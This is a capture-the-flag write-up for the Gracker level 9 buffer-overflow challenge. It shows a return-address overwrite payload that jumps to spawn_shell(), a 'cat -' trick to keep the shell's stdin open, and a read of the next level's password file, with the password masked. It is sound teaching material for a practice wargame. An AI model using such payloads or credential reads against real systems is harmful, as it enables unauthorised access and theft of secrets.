Gracker level9 (Buffer overflow - a pool with the lid closed)

Try the challenge thoroughly before reading the write-up. Otherwise, it's your loss.

We ssh to [email protected] and authenticate using the password we had obtained after solving the previous level.

Recap of previous level.

The recap of the previous level gives a different solution than mine. Do check it out too. In my solution, I was actually foolish not to notice that the password was present on the stack all this time (not just at the addresses near its address).

Level9

The story of this level tells us that the level is similar to level6, but with a minor change: we'll just have to keep STDIN alive. Let's use the same exploit we used in the level6 solution and see what happens. However, this time around the address of spawn_shell() seems to have changed, so we first look it up in the disassembly and then use that address in our exploit…

[email protected]:/matrix/level9$ objdump -d level9

level9:     file format elf32-i386

[...snip...]
 8048572:	83 c4 10             	add    $0x10,%esp
 8048575:	c9                   	leave  
 8048576:	e9 75 ff ff ff       	jmp    80484f0 <register_tm_clones>

0804857b <spawn_shell>:
 804857b:	55                   	push   %ebp
 804857c:	89 e5                	mov    %esp,%ebp
 804857e:	83 ec 18             	sub    $0x18,%esp
[...snip...]
[email protected]:/matrix/level9$ (python -c "print 'A'*44 + '\x7b\x85\x04\x08'") | ./level9
Hello, I'm the MCP (Master Control Program). I'm here to protect the TRON system.
What are you doing here? Are you a user or a program?
Where did you come from? Proof your identity:
Return to: 0x804857b
Welcome to Arjia City!
zsh: done                          ( python -c "print 'A'*44 + '\x7b\x85\x04\x08'"; ) | 
zsh: illegal hardware instruction  ./level9
[email protected]:/matrix/level9$ 

The spawned shell exits before we get a chance to type any commands: once python has printed the payload it exits, the write end of the pipe is closed, and the shell reads EOF on its stdin and terminates. So we'll have to find a way to keep STDIN open. How about using the cat - command, which keeps reading from our terminal and forwarding it into the pipe?

[email protected]:/matrix/level9$ (python -c "print 'A'*44 + '\x7b\x85\x04\x08'"; cat - ) | ./level9
Hello, I'm the MCP (Master Control Program). I'm here to protect the TRON system.
What are you doing here? Are you a user or a program?
Where did you come from? Proof your identity:
Return to: 0x804857b
Welcome to Arjia City!
whoami
level10
cat /home/level10/.pass
************
zsh: broken pipe                   ( python -c "print 'A'*44 + '\x7b\x85\x04\x08'"; cat -; ) | 
zsh: illegal hardware instruction  ./level9
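
The pipe behaviour behind the two attempts above, as an added example that is not part of the write-up: a plain sh stands in for the shell spawn_shell() starts, a harmless echo (constructed) stands in for the overflow string, and "echo interactive" stands in for what the user types after the shell comes up.

```sh
#!/bin/sh
# Added example (not from the write-up): why the spawned shell dies without "cat -".
# The inner "sh" stands in for the shell that spawn_shell() starts; PAYLOAD is a
# harmless, constructed stand-in for the overflow string; "echo interactive" is
# what the user types after the shell has come up.
PAYLOAD='echo payload-delivered'

# Pattern of the first attempt: ( producer ) | victim.
# The producer exits as soon as it has printed, the pipe's write end closes,
# the shell reads EOF on stdin and exits. Whatever the user types afterwards
# lands on the outer shell's stdin, which nothing is reading.
without_cat() {
    printf 'echo interactive\n' | sh -c '( printf "%s\n" "$1" ) | sh' sh "$PAYLOAD"
}

# Pattern of the second attempt: ( producer; cat - ) | victim.
# After the producer finishes, "cat -" keeps the write end open and relays the
# outer stdin into the pipe, so the shell keeps reading commands until the user
# closes input (EOF); only then does cat exit and the pipe finally close.
with_cat() {
    printf 'echo interactive\n' | sh -c '( printf "%s\n" "$1"; cat - ) | sh' sh "$PAYLOAD"
}

# The last output line shows which commands actually reached the inner shell.
last_line_without_cat() { without_cat | tail -n 1; }   # prints "payload-delivered"
last_line_with_cat()    { with_cat    | tail -n 1; }   # prints "interactive"

echo "without cat -: $(without_cat | tr '\n' ' ')"
echo "with cat -:    $(with_cat | tr '\n' ' ')"
```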

And voilà! We have the password to the next level. I am not revealing the password here so that readers try the challenge on their own.